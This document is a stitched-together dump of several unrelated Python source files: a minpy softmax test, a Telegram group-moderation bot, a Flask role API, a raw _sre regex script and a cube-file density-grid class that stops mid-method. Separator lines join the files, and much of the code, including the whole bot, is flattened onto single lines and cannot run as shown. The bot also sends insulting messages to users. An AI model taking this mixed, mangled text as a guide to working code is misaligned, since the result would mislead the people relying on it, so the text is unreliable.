# This single line of code will run MXNet operations on GPU 0.
# set_context(gpu(0))  # set the global context as gpu(0)

# Predict the class using multinomial logistic regression (softmax regression).
# Because MXNet's implementation does not support mu and sigma to be arrays
# (only scalar is supported right now), we need to change the policy for
# this function by `@minpy.wrap_policy`or `with minpy.OnlyNumPyPolicy(): ...`

""" Generates several clusters of Gaussian points """


def test_policy():
    """Train softmax regression on synthetic Gaussian clusters to exercise
    minpy's wrap_policy ("only_numpy") and autograd machinery."""

    @minpy.wrap_policy("only_numpy")
    def gaussian_cluster_generator(num_samples=10000, num_features=500, num_classes=5):
        # One Gaussian per class; returns features x and one-hot labels y.
        mu = np.random.rand(num_classes, num_features)
        sigma = np.ones((num_classes, num_features)) * 0.1
        num_cls_samples = int(num_samples / num_classes)
        x = np.zeros((num_samples, num_features))
        y = np.zeros((num_samples, num_classes))
        for i in range(num_classes):
            cls_samples = np.random.normal(mu[i, :], sigma[i, :], (num_cls_samples, num_features))
            x[i * num_cls_samples:(i + 1) * num_cls_samples] = cls_samples
            y[i * num_cls_samples:(i + 1) * num_cls_samples, i] = 1
        return x, y

    def predict(w, x):
        # Softmax over the linear scores x @ w.
        a = np.exp(np.dot(x, w))
        a_sum = np.sum(a, axis=1, keepdims=True)
        prob = a / a_sum
        return prob

    def train_loss(w, x):
        # Mean cross-entropy against the one-hot labels (closure over `label`).
        prob = predict(w, x)
        loss = -np.sum(label * np.log(prob)) / num_samples
        return loss

    """Use Minpy's auto-grad to derive a gradient function off loss"""
    grad_function = grad_and_loss(train_loss)

    # Using gradient descent to fit the correct classes.
    def train(w, x, loops):
        for i in range(loops):
            dw, loss = grad_function(w, x)
            if i % 10 == 0:
                print('Iter {}, training loss {}'.format(i, loss))
            # gradient descent
            w -= 0.1 * dw

    # Initialize training data.
    num_samples = 10000
    num_features = 500
    num_classes = 5
    data, label = gaussian_cluster_generator(num_samples, num_features, num_classes)

    # Initialize training weight and train
    weight = random.randn(num_features, num_classes)
    train(weight, data, 100)


if __name__ == "__main__":
    test_policy()
nilq/baby-python
python
from .pytorch_sampler import PyTorchSampler from .sampler import Sampler from .unigram import UnigramDistribution from .vocab import Vocabulary
nilq/baby-python
python
import json import os import tempfile from datetime import datetime, timedelta from enum import Enum from itertools import zip_longest, groupby from threading import Timer from typing import Any, List, Optional, Dict, Iterable, Tuple, Set import sentry_sdk from telegram import ParseMode, TelegramError, Update, Message, ChatPermissions from telegram.error import BadRequest from telegram.ext import CallbackContext, Updater from .chat import Chat, User from .decorators import Command from .logger import create_logger def grouper(iterable, n, fillvalue=None) -> Iterable[Tuple[Any, Any]]: """Collect data into fixed-length chunks or blocks""" args = [iter(iterable)] * n return zip_longest(*args, fillvalue=fillvalue) class SpamType(Enum): NONE = 0 CONSECUTIVE = 1 DIFFERENT = 2 SAME = 3 class Bot: def __init__(self, updater: Updater, state_filepath: str): self.logger = create_logger("hhh_diff_bot") self.chats: Dict[int, Chat] = {} self.updater = updater self.main_admin_ids: Set[int] = self._load_main_admin_ids() self.state: Dict[str, Any] = { "group_message_id": [], "recent_changes": [], "hhh_id": -1001473841450, "pinned_message_id": None } self.groups = [] self.state_filepath = state_filepath def _load_main_admin_ids(self) -> Set[int]: raw_value = os.getenv("MAIN_ADMIN_IDS") if not raw_value: self.logger.warning("MAIN_ADMIN_IDS is not set!") return set() try: id_list = json.loads(raw_value) except ValueError as e: self.logger.error("Could not load main admins", exc_info=e) return set() if not isinstance(id_list, list): self.logger.error("MAIN_ADMIN_IDS is not a JSON list") return set() result = set() for main_admin_id in id_list: try: result.add(int(main_admin_id)) except ValueError: self.logger.error("Not a valid user ID: %s", main_admin_id) return result def save_state(self) -> None: self.state["chats"] = [chat.serialize() for chat in self.chats.values()] self.state["groups"] = self.groups with open(self.state_filepath, "w+") as f: json.dump(self.state, f) 
@Command(chat_admin=True) def delete_chat(self, update: Update, context: CallbackContext) -> None: chat: Chat = context.chat_data["chat"] if chat.id in self.chats: self.logger.info(f"Deleting chat ({chat}) from state.") del self.chats[chat.id] del context.chat_data["chat"] @Command(main_admin=True) def delete_chat_by_id(self, update: Update, context: CallbackContext) -> Optional[Message]: try: chat_id = int(context.args[0]) except (IndexError, ValueError): return update.effective_message.reply_text( text=f"Enter a (valid) chat_id as an argument to use this command.") try: self.chats.pop(chat_id) except KeyError: return update.effective_message.reply_text(text=f"Not a valid chat_id.") def set_user_restriction(self, chat_id: int, user: User, until_date: timedelta, permissions: ChatPermissions, reason: str = None) -> bool: timestamp: int = int((datetime.now() + until_date).timestamp()) try: result: bool = self.updater.bot.restrict_chat_member(chat_id, user.id, permissions, until_date=timestamp) if not permissions.can_send_messages: datestring: str = str(until_date).rsplit(".")[0] # str(timedelta) -> [D day[s], ][H]H:MM:SS[.UUUUUU] message = f"{user.name} has been restricted for {datestring}." if reason: message += f"\nReason: {reason}" self.send_message(chat_id=chat_id, text=message, disable_notification=True) except TelegramError as e: if e.message == "Can't demote chat creator" and not permissions.can_send_messages: message = "Sadly, user {} couldn't be restricted due to: `{}`. 
Shame on {}".format(user.name, e.message, user.name) self.logger.debug("{}".format(message)) self.send_message(chat_id=chat_id, text=message, parse_mode=ParseMode.MARKDOWN) self.logger.error(e) result = False return result def unmute_user(self, chat_id: int, user: User) -> bool: result = False permissions = ChatPermissions(can_send_messages=True, can_send_media_messages=True, can_send_other_messages=True, can_add_web_page_previews=True) try: # if self.updater.bot.promote_chat_member(chat_id, user.id, can_post_messages=True): if self.set_user_restriction(chat_id, user, timedelta(minutes=0), permissions): user.muted = False result = True else: self.logger.error("Failed to unmute user") except TelegramError: self.logger.error("Error while promoting chat member", exc_info=True) return result def mute_user(self, chat_id: int, user: User, until_date: timedelta, reason: Optional[str] = None) -> bool: if user.muted: return True permissions = ChatPermissions(can_send_messages=False) result = False self.logger.info(f"Reason for muting: {reason}") if self.set_user_restriction(chat_id, user, until_date=until_date, reason=reason, permissions=permissions): user.muted = True result = True # We'd need to parse the exception before assigning user.muted differently def _set_user_unmute(): user.muted = False self.logger.info(f"Set timer for {until_date.total_seconds()}s to set user mute state to `False`") Timer(until_date.total_seconds(), _set_user_unmute).start() return result def update_recent_changes(self, update: str): rc: List[str] = self.state.get("recent_changes", []) if len(rc) > 2: rc.pop() self.state["recent_changes"] = [update] + rc @staticmethod def create_latest_change_text(chat: Chat, new_title: str, delete: bool = False) -> str: change = f"Added {chat.title}" if new_title: change = f"{chat.title} -> {new_title}" elif delete: change = f"Removed {chat.title}" return change def build_hhh_group_list_text(self, prefix: str = "", suffix: str = "") -> List[str]: """ For now, 
we'll assume that chats starting with the same letter will all fit into a single message :param prefix: Put in front of the constructed text for the groups names :param suffix: Put behind of the constructed text for the groups names :return: List[str] """ def chat_to_item(chat: Chat): try: if chat.invite_link: return f"<a href=\"{chat.invite_link}\">{chat.title}</a>" else: return f"{chat.title}" except AttributeError: return f"{chat.title}" messages = [] message = f"{prefix}\n" if prefix else "" """ Telegram counts the character count after entity parsing. i.e. <a href="https://example.com">A</a> should only be one character We need this for the invite links """ deductable_per_chat = 0 for _, g in groupby( sorted([chat for _, chat in self.chats.items() if chat and chat.title], key=lambda c: c.title.lower()), key=lambda c: c.title[0].lower()): line = " | ".join([chat_to_item(chat) for chat in g]) + "\n" if len(message) + len(line) - deductable_per_chat * len(list(g)) >= 4096: messages.append(message) message = "" message += line if len(message) + len(suffix) >= 4096: messages.append(message) message = "" message += suffix messages.append(message) return messages @property def group_message_ids(self) -> List: """ This is purely for migrative purposes (str -> list) :return: List[str] """ value = self.state.get("group_message_id", []) if not value: return [] elif isinstance(value, str): return [value] else: return value @group_message_ids.setter def group_message_ids(self, value: List[str]): self.state["group_message_id"] = value def delete_message(self, chat_id: str, message_id: str, *args, **kwargs): return self.updater.bot.delete_message(chat_id=chat_id, message_id=message_id, *args, **kwargs) def update_hhh_message(self, chat: Chat, new_title: str = "", delete: bool = False, retry: bool = False): if not retry: latest_change = self.create_latest_change_text(chat, new_title, delete) self.logger.debug(f"Add latest change {latest_change} to recent_changes") 
self.update_recent_changes(latest_change) if new_title: self.logger.debug(f"Update chat.title ({chat.title}) to {new_title}.") chat.title = new_title self.chats.update({chat.id: chat}) if delete and chat.id in self.chats.keys(): self.chats.pop(chat.id) self.logger.debug(f"Build new group list.") total_group_count_text = f"{len([c for c in self.chats.values() if c.title])} groups in total" changes = "\n".join(["========", "\n".join(self.state["recent_changes"])]) messages = self.build_hhh_group_list_text(prefix=total_group_count_text, suffix=changes) diff = len(messages) - len(self.group_message_ids) if diff > 0: # We have to send more messages than before # -> send a new set of messages since we can't insert one into the conversation self.group_message_ids = [] elif diff < 0: # We have less messages than before # -> delete the unused ones for message_id in self.group_message_ids[-diff:]: try: self.delete_message(self.state["hhh_id"], message_id) except BadRequest as e: self.logger.debug("Exception occured", exc_info=True) pinned = False for index, message_text in enumerate(messages): if not self.group_message_ids or index >= len(self.group_message_ids): self.logger.debug(f"Send {len(messages)} new messages.") message: Message = self.send_message(chat_id=self.state["hhh_id"], text=message_text, parse_mode=ParseMode.HTML) self.group_message_ids = self.group_message_ids + [message.message_id] if not pinned: try: if self.state.get("pinned_message_id"): try: self.updater.bot.unpin_chat_message(chat_id=self.state["hhh_id"], message_id=self.state["pinned_message_id"]) except BadRequest: self.logger.error("Couldn't unpin message", exc_info=True) self.updater.bot.pin_chat_message(chat_id=self.state["hhh_id"], message_id=self.group_message_ids[0], disable_notification=True) self.state["pinned_message_id"] = self.group_message_ids[0] pinned = True except BadRequest: self.logger.error("Couldn't pin the message", exc_info=True) pass else: try: self.logger.debug(f"Edit an old 
message with the new text ({message_text})") self.updater.bot.edit_message_text(message_text, chat_id=self.state["hhh_id"], message_id=self.group_message_ids[index], disable_web_page_preview=True, parse_mode=ParseMode.HTML) except BadRequest as e: self.logger.exception("Couldn't edit message", exc_info=True) if e.message == "Message to edit not found": self.logger.debug("Try sending a new message") self.group_message_ids = [] return self.update_hhh_message(chat, new_title, delete, retry=True) @Command() def handle_message(self, update: Update, context: CallbackContext) -> None: self.logger.info("Handle message: {}".format(update.effective_message.text)) @Command() def handle_left_chat_member(self, update: Update, context: CallbackContext) -> None: chat: Chat = context.chat_data["chat"] if update.effective_message.left_chat_member.id != self.updater.bot.id: try: user: User = [user for user in chat.users if user.id == update.effective_message.left_chat_member.id][0] except IndexError: self.logger.error("Couldn't find user in chat") else: chat.users.remove(user) else: self.update_hhh_message(chat, "", delete=True) context.chat_data.clear() def set_state(self, state: Dict[str, Any]) -> None: self.state = state self.chats = {schat["id"]: Chat.deserialize(schat, self.updater.bot) for schat in state.get("chats", [])} def send_message(self, *, chat_id: int, text: str, **kwargs) -> Message: return self.updater.bot.send_message(chat_id=chat_id, text=text, disable_web_page_preview=True, **kwargs) def _get_chat_by_title(self, title: str) -> Optional[Chat]: for chat in self.chats.values(): if title == chat.title: return chat return None @Command() def show_users(self, update: Update, context: CallbackContext) -> Optional[Message]: from_chat: Chat = context.chat_data["chat"] if context.args: search_title = " ".join(context.args).strip() chat: Optional[Chat] = self._get_chat_by_title(search_title) if not chat: return self.send_message(chat_id=from_chat.id, text="This chat doesn't 
exist") else: chat = from_chat sorted_users: List[User] = sorted(chat.users, key=lambda _user: _user.name) if sorted_users: message = "\n".join([user.name for user in sorted_users]) else: message = "No active users. Users need to write a message in the chat to be recognized (not just a command)" return self.send_message(chat_id=from_chat.id, text=message) @Command() def new_member(self, update: Update, context: CallbackContext) -> None: chat = context.chat_data["chat"] self.logger.info(f"New member(s) have joined this chat") for member in update.effective_message.new_chat_members: if member.id != self.updater.bot.id: chat.users.add(User.from_tuser(member)) else: try: self.update_hhh_message(context.chat_data["chat"], "") except BadRequest: self.logger.exception("Failed to update message", exc_info=True) self.send_message(chat_id=self.state["hhh_id"], text=f"Created {update.effective_chat.title}") @Command() def status(self, update: Update, context: CallbackContext) -> Message: return update.effective_message.reply_text(text=f"{context.chat_data['chat']}") @Command() def version(self, update: Update, context: CallbackContext) -> Message: return update.effective_message.reply_text("{{VERSION}}") @Command() def server_time(self, update: Update, context: CallbackContext) -> Message: return update.effective_message.reply_text(datetime.now().strftime("%d-%m-%Y %H-%M-%S")) @Command() def get_data(self, update: Update, context: CallbackContext) -> Message: chat: Chat = context.chat_data["chat"] data = [_chat for _chat in self.state.get("chats", []) if _chat.get("id") == chat.id] if data: with tempfile.TemporaryFile() as temp: temp.write(json.dumps(data[0]).encode("utf-8")) temp.seek(0) return self.updater.bot.send_document(chat_id=chat.id, document=temp, filename=f"{chat.title}.json") else: return update.effective_message.reply_text("Couldn't find any data for this chat.") @Command(chat_admin=True) def mute(self, update: Update, context: CallbackContext): if not 
context.args: message = "Please provide a user and an optional timeout (`/mute <user> [<timeout in minutes>] [<reason>]`)" self.logger.warning("No arguments have been provided, don't execute `mute`.") return self.send_message(chat_id=update.message.chat_id, text=message, parse_mode=ParseMode.MARKDOWN) username = context.args[0] minutes = 15 reason = " ".join(context.args[2:]) try: minutes = int(context.args[1]) except (IndexError, ValueError): sentry_sdk.capture_exception() self.logger.error("Exception while getting time string from mute command", exc_info=True) mute_time = timedelta(minutes=minutes) chat = context.chat_data["chat"] try: user = next(filter(lambda x: x.name == username, chat.users)) except StopIteration: sentry_sdk.capture_exception() self.logger.warning(f"Couldn't find user {username} in users for chat {update.message.chat_id}", exc_info=True) update.effective_message.reply_text(f"Can't mute {username} (not found in current chat).") else: self.mute_user(update.message.chat_id, user, until_date=mute_time, reason=reason) @Command(chat_admin=True) def unmute(self, update: Update, context: CallbackContext): if not context.args: message = "You have to provide a user which should be unmuted." 
self.logger.warning("No arguments have been provided, don't execute `unmute`.") return update.effective_message.reply_text(message, parse_mode=ParseMode.MARKDOWN) username: str = context.args[0].strip() chat: Chat = context.chat_data["chat"] # @all is an unusable username if username == "@all": for user in chat.users: try: self.unmute_user(chat.id, user) except BadRequest: self.logger.error(f"Failed to unmute user ({user})") return try: user = next(filter(lambda x: x.name.lower() == username.lower(), chat.users)) except StopIteration: sentry_sdk.capture_exception() self.logger.warning(f"Couldn't find user {username} in users for chat {update.message.chat_id}", exc_info=True) update.effective_message.reply_text(f"Can't unmute {username} (not found in current chat).") else: if self.unmute_user(chat.id, user): update.effective_message.reply_text(f"Successfully unmuted {username}.") else: update.effective_message.reply_text(f"Failed to unmute {username}.") @Command() def handle_unknown_command(self, update: Update, context: CallbackContext): user: User = context.user_data["user"] chat: Chat = context.chat_data["chat"] reason = "This is not a valid command fuckwit." 
self.mute_user(chat_id=chat.id, user=user, until_date=timedelta(minutes=15), reason=reason) def kick_user(self, chat: Chat, user: User): return self.updater.bot.kick_chat_member(chat_id=chat.id, user_id=user.id) @Command(chat_admin=True) def kick(self, update: Update, context: CallbackContext): chat: Chat = context.chat_data["chat"] if not context.args: message = "Please provide a user and an optional reason(`/kick <user> [<reason>]`)" self.logger.warning("No arguments have been provided, don't execute `kick`.") return update.message.reply_text(text=message, parse_mode=ParseMode.MARKDOWN) username = context.args[0] reason = " ".join(context.args[1:]) try: user: User = next(filter(lambda x: x.name == username, chat.users)) except StopIteration: sentry_sdk.capture_exception() self.logger.warning(f"Couldn't find user {username} in users for chat {update.message.chat_id}", exc_info=True) update.effective_message.reply_text(f"Can't kick {username} (not found in current chat).") else: try: result = self.kick_user(chat, user) except TelegramError as e: message = f"Couldn't remove {user.name} from chat due to error ({e})" self.logger.error(message) update.message.reply_text(message) else: if result: message = f"{user.name} was kicked from chat" message += f" due to {reason}." if reason else "." 
self.logger.debug(message) chat.users.remove(user) update.message.reply_text(message) else: message = f"{user.name} couldn't be kicked from chat" self.logger.warning(message) update.effective_message.reply_text(message) @Command() def new_chat_title(self, update: Update, context: CallbackContext): chat: Chat = context.chat_data["chat"] new_title = update.effective_message.new_chat_title self.update_hhh_message(chat, new_title) @Command() def chat_created(self, update: Update, context: CallbackContext): try: self.update_hhh_message(context.chat_data["chat"], "") except BadRequest: self.logger.exception("Failed to update message", exc_info=True) self.send_message(chat_id=self.state["hhh_id"], text=f"Created {update.effective_chat.title}") @Command(chat_admin=True) def add_invite_link(self, update: Update, context: CallbackContext): chat: Chat = context.chat_data["chat"] if context.args: invite_link: str = context.args[0] else: return update.effective_message.reply_text("Provide an invite link moron") if _validate_invite_link(invite_link): chat.invite_link = invite_link if update.effective_message.reply_text("Added (new) invite link"): self.update_hhh_message(context.chat_data["chat"], "", retry=True) else: return update.effective_message.reply_text( "invite link isn't in a correct form (tg://join?invite=[...] | https://t.me/joinchat/[...] 
| t.me/[...]") @Command() def get_invite_link(self, update: Update, context: CallbackContext): if context.args: group_name: str = " ".join(context.args) else: return update.effective_message.reply_text("Provide a group name moron") try: chat: Chat = [c for c in self.chats.values() if c.title == group_name][0] except IndexError: return update.effective_message.reply_text("I don't know that group") if chat.invite_link: return update.effective_message.reply_text(chat.invite_link) else: return update.effective_message.reply_text("No invite link found for the given group") @Command(chat_admin=True) def remove_invite_link(self, update: Update, context: CallbackContext): chat: Chat = context.chat_data["chat"] chat.invite_link = None self.update_hhh_message(context.chat_data["chat"], "", retry=True) @Command() def migrate_chat_id(self, update: Update, context: CallbackContext): self.logger.debug(f"Migrating {update.effective_message}") if not update.effective_message.migrate_from_chat_id: self.logger.warning("Aborting migration since `migrate_from_chat_id` is unset, see #49") return None from_id = int(update.effective_message.migrate_from_chat_id) to_id = int(update.effective_message.chat.id) self.logger.debug(f"Update chat_id to {to_id} (was: {from_id})") new_chat = context.chat_data["chat"] new_chat.id = to_id context.chat_data["chat"] = new_chat self.chats[to_id] = new_chat self.chats.pop(from_id) @Command() def renew_diff_message(self, update: Update, context: CallbackContext): self.group_message_ids = [] # retry doesn't update the recent changes self.update_hhh_message(context.chat_data["chat"], "", retry=True) def me(self): return self.updater.bot.get_me() @Command() def noop(self, update: Update, context: CallbackContext): self.logger.debug(update) pass def _split_messages(lines): message_length = 4096 messages = [] current_length = 0 current_message = 0 for line in lines: if len(messages) <= current_message: messages.append([]) line_length = len(line) if 
current_length + line_length < message_length: current_length += line_length messages[current_message].append(line) else: current_length = 0 current_message += 1 return messages def _validate_invite_link(link: str) -> bool: import re if re.match(r"https://t.me/(joinchat/)?.*", link): return True m = re.match(r"tg://join\?invite=.*", link) b = bool(m) return b
nilq/baby-python
python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2007 Free Software Foundation, Inc. <https://fsf.org/>
#
# Licensed under the GNU General Public License, version 3 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://jxself.org/translations/gpl-3.zh.shtml
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import uuid
from sfo_server import access_logger
from sfo_server.models import SfoServerRole, db, SfoServerPermission
from flask_restful import Resource, request, abort, fields, marshal_with
from sfo_server.decorate import access_log_decorate, permission_required, login_required
from sfo_server.resource.common import timestamp_format

# Response schema used by flask_restful's marshal_with for role listings.
rolelist_resource_fields = {
    "status": fields.String,
    "message": fields.String,
    "data": fields.List(fields.Nested({
        "role_name": fields.String,
        "add_time": fields.String,
        "last_modify_time": fields.String,
        "role_desc": fields.String
    }))
}


def get_role_list():
    """Query all roles.

    Returns a (resp, status) pair: status 200 with the role records in
    resp['data'], or 404 when no role exists.
    """
    status = ''
    message = ''
    data = []
    resp = {"status": status, "message": message, "data": data}
    sfo_server_rolelist = SfoServerRole.query.all()
    if sfo_server_rolelist:
        data = sfo_server_rolelist
        status = 200
        message = 'SUCCESS'
    else:
        status = 404
        message = 'Not Found Record'
    resp.update({"status": status, "message": message, "data": data})
    return resp, status


def add_role_logic(role_json):
    """Create a new role from the request payload.

    Every key of `role_json` that matches an attribute of SfoServerRole is
    copied onto the new role; the 'permissions' value is first resolved to
    permission objects. Returns a (resp, status) pair: 200 on success,
    501 for an empty payload, 502 on a database/model error.
    """
    status = ''
    message = ''
    resp = {"status": status, "message": message}
    new_role = SfoServerRole()
    try:
        if role_json:
            for key, value in role_json.items():
                if hasattr(new_role, key):
                    if key == 'permissions':
                        value = SfoServerPermission.query_permissions(value)
                    setattr(new_role, key, value)
            new_role.guid = str(uuid.uuid4())
            new_role.add_time = new_role.last_modify_time = timestamp_format(time.time())
            db.session.add(new_role)
            db.session.commit()
            status = 200
            # BUG FIX: was misspelled 'SUCCCESS' — now consistent with get_role_list.
            message = 'SUCCESS'
        else:
            status = 501
            message = 'Null Value %s' % role_json
    # Modernized from the Python-2-only `except Exception, ex` form;
    # `except ... as ...` is valid on Python 2.6+ and Python 3.
    except Exception as ex:
        status = 502
        message = str(ex)
    resp.update({"status": status, "message": message})
    return resp, status


class SfoServerRoleListAPI(Resource):
    """REST resource for listing (GET) and creating (POST) server roles."""
    resource = SfoServerRole
    # Both decorators apply to every HTTP method of this resource.
    method_decorators = [permission_required(resource), login_required]

    @marshal_with(rolelist_resource_fields)
    def get(self):
        """Return all roles marshalled through rolelist_resource_fields."""
        try:
            resp, status = get_role_list()
            return resp, status
        except Exception as ex:
            status = 500
            message = str(ex)
            return {'status': status, "message": message}, status

    def post(self):
        """Create a role from the JSON body; 400 when no JSON is supplied."""
        try:
            if not request.json:
                abort(400)
            role_json = request.json
            resp, status = add_role_logic(role_json)
            return resp, status
        except Exception as ex:
            status = 500
            message = str(ex)
            return {'status': status, "message": message}, status
nilq/baby-python
python
# # Copyright (c) 2017-2018 Joy Diamond. All rights reserved. # __import__('Boot').boot() def line(format, *args): print format % args def main(): if 0: from Pattern import make_match_function joy_match = make_match_function('[Aa](m)i(?P<what>t)\Z') else: import _sre joy_match = _sre.compile( None,#'[Aa](m)i(?P<what>t)\\Z', 0, [ 17, 9, 4, 4, 4, 19, 65, 19, 97, 0, 15, 6, 19, 65, 19, 97, 0, 21, 0, 19, 109, 21, 1, 19, 105, 21, 2, 19, 116, 21, 3, 6, 7, 1, ], 2, {'what': 2}, ((None, None, 'what')), ).match m = joy_match('Joy') print m.group(0, 1, 2)
nilq/baby-python
python
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 20 15:12:49 2016

@author: uzivatel
"""

import numpy as np
import scipy
from functools import partial
from copy import deepcopy

from .general import Coordinate,Grid
from ...General.UnitsManager import PositionUnitsManaged,position_units
from ...General.types import UnitsManaged
from ..positioningTools import RotateAndMove, RotateAndMove_1, CenterMolecule


class DensityGrid(PositionUnitsManaged):
    ''' Class representing electronic density on a spatial grid (e.g. molecular
    orbitals, transition density, ...).

    origin : numpy.array of real (dimension 3)
        origin of density grid (Position managed units)
    grid : numpy.array of integer (dimension 3)
        number of grid points at each dimension
    step : numpy.array of real (dimension 3x3)
        step[i,:] translational vector in first dimension (Position managed units)
    data : numpy.array of real (dimension Npoints_x x Npoints_y x Npoints_z)
        Density values on the grid. data[i,j,k] correspond to the point with
        coordinates self.origin+i*self.step[0,:]+j*self.step[1,:]+k*self.step[2,:]
    type : string
        If ``typ='mo'`` density values correspond to a real wavefunction,
        otherwise it is an electron density
    indx : integer
        Index of molecular orbital to which the wavefunction corresponds
    coor : Coordinate class
        Atomic coordinates for every atom in the molecule or complex
        (Position managed units)
    at_charge : numpy array of real, integer or string (dimension Natoms)
        Proton number for every atom in the molecule or complex

    Functions
    ----------
    rotate :
        Rotate the density and all its properties by specified angles in
        radians in positive direction.
    rotate_1 :
        Inverse rotation to rotate.
    move :
        Moves the density and all its properties along specified vector.
    center :
        Center the density and align in defined plane.
    copy :
        Create 1 to 1 deep copy of the density with all classes and types.
    import_cub :
        Read density from cube file.
    output :
        Outputs density into cube file.
    get_axes :
        Outputs x, y and z axis of the grid on which density is evaluated
        (only for nonrotated grid - oriented along coordinate axis).
    dipole :
        Numerical calculation of dipole from the density.
    dipole_partial :
        Numerical calculation of dipole for only a specified spatial cut of
        the density (only for nonrotated grid - oriented along coordinate axis).
    cut :
        Spatial cut of the density which is outputed as a new density
        (only for nonrotated grid - oriented along coordinate axis).
    calc_atomic_properties :
        Calculate atomic charges and dipoles by numerical integration of the
        density; each grid point is assigned to the nearest atom.
    '''

    # Unit-managed descriptors: attribute access converts between the current
    # position units and the internal (Bohr) representation (self._origin /
    # self._step hold the raw internal values).
    origin=UnitsManaged("origin")
    step=UnitsManaged("step")

    def __init__(self,origin,grid,step,density,typ='mo',mo_indx=1,Coor=None,At_charge=None):
        # All array inputs are defensively copied; None is preserved so an
        # empty container can be filled later (e.g. by import_cub).
        if origin is None:
            self.origin=None
        else:
            self.origin = np.copy(origin)
        if grid is None:
            self.grid=None
        else:
            self.grid = np.copy(grid)
        if step is None:
            self.step=None
        else:
            self.step = np.copy(step)
        if density is None:
            self.data=None
        else:
            self.data = np.copy(density)
        self.type = typ
        self.indx = mo_indx
        if Coor is None:
            self.coor=None
        else:
            self.coor = Coordinate(Coor)
        self.at_charge = np.copy(At_charge)

    def output(self,filename='density.cub'):
        ''' Output density to cube file.

        Parameters
        ----------
        filename : string (optional - init='density.cub')
            Output file name including the path to output folder
        '''
        # Cube files are written in atomic units (Bohr); the unit context
        # makes the managed attributes return Bohr values.
        with position_units('Bohr'):
            Coor = np.copy(self.coor.value)
            Grid = np.copy(self.grid)
            Step = np.copy(self.step)
            At_charge = np.copy(self.at_charge)
            with open(filename, "wt") as f:
                # Write the cube-file header (first two lines are free text).
                f.write("____Zde muze byt napsano cokoliv____ \n MO coefficients \n")
                # f.write(" %i %5.2f %5.2f %5.2f \n" % (-len(qc.at_coord),min_[0],min_[1],min_[2]))
                # A negative atom count flags an MO cube (per cube convention).
                if self.type=='mo':
                    f.write("{:5d}".format(-len(Coor)))
                else:
                    f.write("{:5d}".format(len(Coor)))
                for ii in range(3):
                    f.write("{:12.6f}".format(self.origin[ii]))
                f.write("{:5d}\n".format(1))
                f.write("{:5d}{:12.6f}{:12.6f}{:12.6f}\n".format(Grid[0], Step[0,0], Step[0,1], Step[0,2] ))
                f.write("{:5d}{:12.6f}{:12.6f}{:12.6f}\n".format(Grid[1], Step[1,0], Step[1,1], Step[1,2] ))
                f.write("{:5d}{:12.6f}{:12.6f}{:12.6f}\n".format(Grid[2], Step[2,0], Step[2,1], Step[2,2] ))
                for ii in range(len(Coor)):
                    f.write("{:5d}{:12.6f}{:12.6f}{:12.6f}{:12.6f}\n".format(int(float(At_charge[ii])), float(At_charge[ii]), Coor[ii,0], Coor[ii,1], Coor[ii,2]))
                if self.type=='mo':
                    f.write("{:5d}{:5d}\n".format(1, self.indx))
                # Write the molecular orbital / density values on the grid,
                # six values per line as the cube format expects.
                for ii in range(self.grid[0]):
                    for jj in range(self.grid[1]):
                        for kk in range(self.grid[2]):
                            f.write("{:13.5E}".format(self.data[ii,jj,kk]))
                            if (kk % 6) == 5:
                                f.write("\n")
                        #f.write("\n")
                        if self.grid[2]%6!=0:
                            f.write("\n")

    def import_cub(self,filename):
        ''' Import data from density cube file.

        Parameters
        ----------
        filename : string
            Input file name (.cub) including the path to file folder
        '''
        origin=np.zeros(3,dtype='f8')
        self.grid=np.zeros(3,dtype='i8')
        step=np.zeros((3,3),dtype='f8')
        fid = open(filename,'r')   # Open the file
        flines = fid.readlines()   # Read the WHOLE file into RAM
        fid.close()                # Close the file
        # Line 3 of a cube file: atom count (sign flags MO cube) + origin.
        thisline = flines[2].split()
        Natom=np.abs(int(thisline[0]))
        if int(thisline[0]) < 0:
            self.type='mo'
        else:
            self.type='transition'
        self.at_charge=np.zeros(Natom,dtype='f')
        Coor=np.zeros((Natom,3),dtype='f8')
        for ii in range(3):
            origin[ii]=float(thisline[ii+1])
        # Grid dimensions and translation vectors (lines 4-6).
        for kk in range(3):
            thisline = flines[kk+3].split()
            self.grid[kk]=int(thisline[0])
            for ii in range(3):
                step[kk,ii]=float(thisline[ii+1])
        # atomic information:
        for kk in range(Natom):
            thisline = flines[kk+6].split()
            self.at_charge[kk]=float(thisline[1])
            for ii in range(3):
                Coor[kk,ii]=float(thisline[ii+2])
        # MO cubes have one extra header line with the orbital index.
        if self.type=='mo':
            thisline = flines[Natom+6].split()
            self.indx=int(thisline[1])
            il=7
        else:
            il=6
        # Cube files store positions in Bohr; assign through the unit manager.
        with position_units('Bohr'):
            self.coor=Coordinate(Coor)
            self.origin=origin.copy()
            self.step=step.copy()
        # read density
        self.data=np.zeros((self.grid[0],self.grid[1],self.grid[2]),dtype='f8')
        counter=np.zeros(3,dtype='i8')
        for kk in range(Natom+il,len(flines)):
            line = flines[kk]           # The current line as string
            thisline = line.split()     # The current line split into segments
            # NOTE(review): assumes six values per data line; a short final
            # line would raise IndexError — confirm against producers used.
            for ii in range(6):
                self.data[counter[0],counter[1],counter[2]]=float(thisline[ii])
                counter[2]+=1
                if counter[2]==self.grid[2]:
                    counter[2]=0
                    counter[1]+=1
                    if counter[1]==self.grid[1]:
                        counter[1]=0
                        counter[0]+=1
                        break

    def get_axes(self):
        """ Outputs x, y and z axis of the grid.
        **Working only for grid oriented along coordinate axis (nonrotated grid)**

        Returns
        --------
        x,y,z : numpy array of float (dimension Grid_Nx, Grid_Ny, Grid_Nz)
            Coordinates of grid points in coordinate axes
        """
        print("Working only for nonrotated grid oriented along coordinate axes")
        # Only the diagonal step components are used -> axis-aligned grid only.
        x=np.arange(self.grid[0])*self.step[0,0]+self.origin[0]
        y=np.arange(self.grid[1])*self.step[1,1]+self.origin[1]
        z=np.arange(self.grid[2])*self.step[2,2]+self.origin[2]
        return x,y,z

    def copy(self):
        ''' Copy DensityGrid class variable into a new one.

        Returns
        ----------
        density_new : DensityGrid class
            New DensityGrid class variable with exactly the same values as the
            original one

        Notes
        ----------
        A plain assignment would only create a reference to the old density;
        deepcopy gives an independent object.
        '''
        density_new = deepcopy(self)
        return density_new

    def move(self,dx,dy,dz):
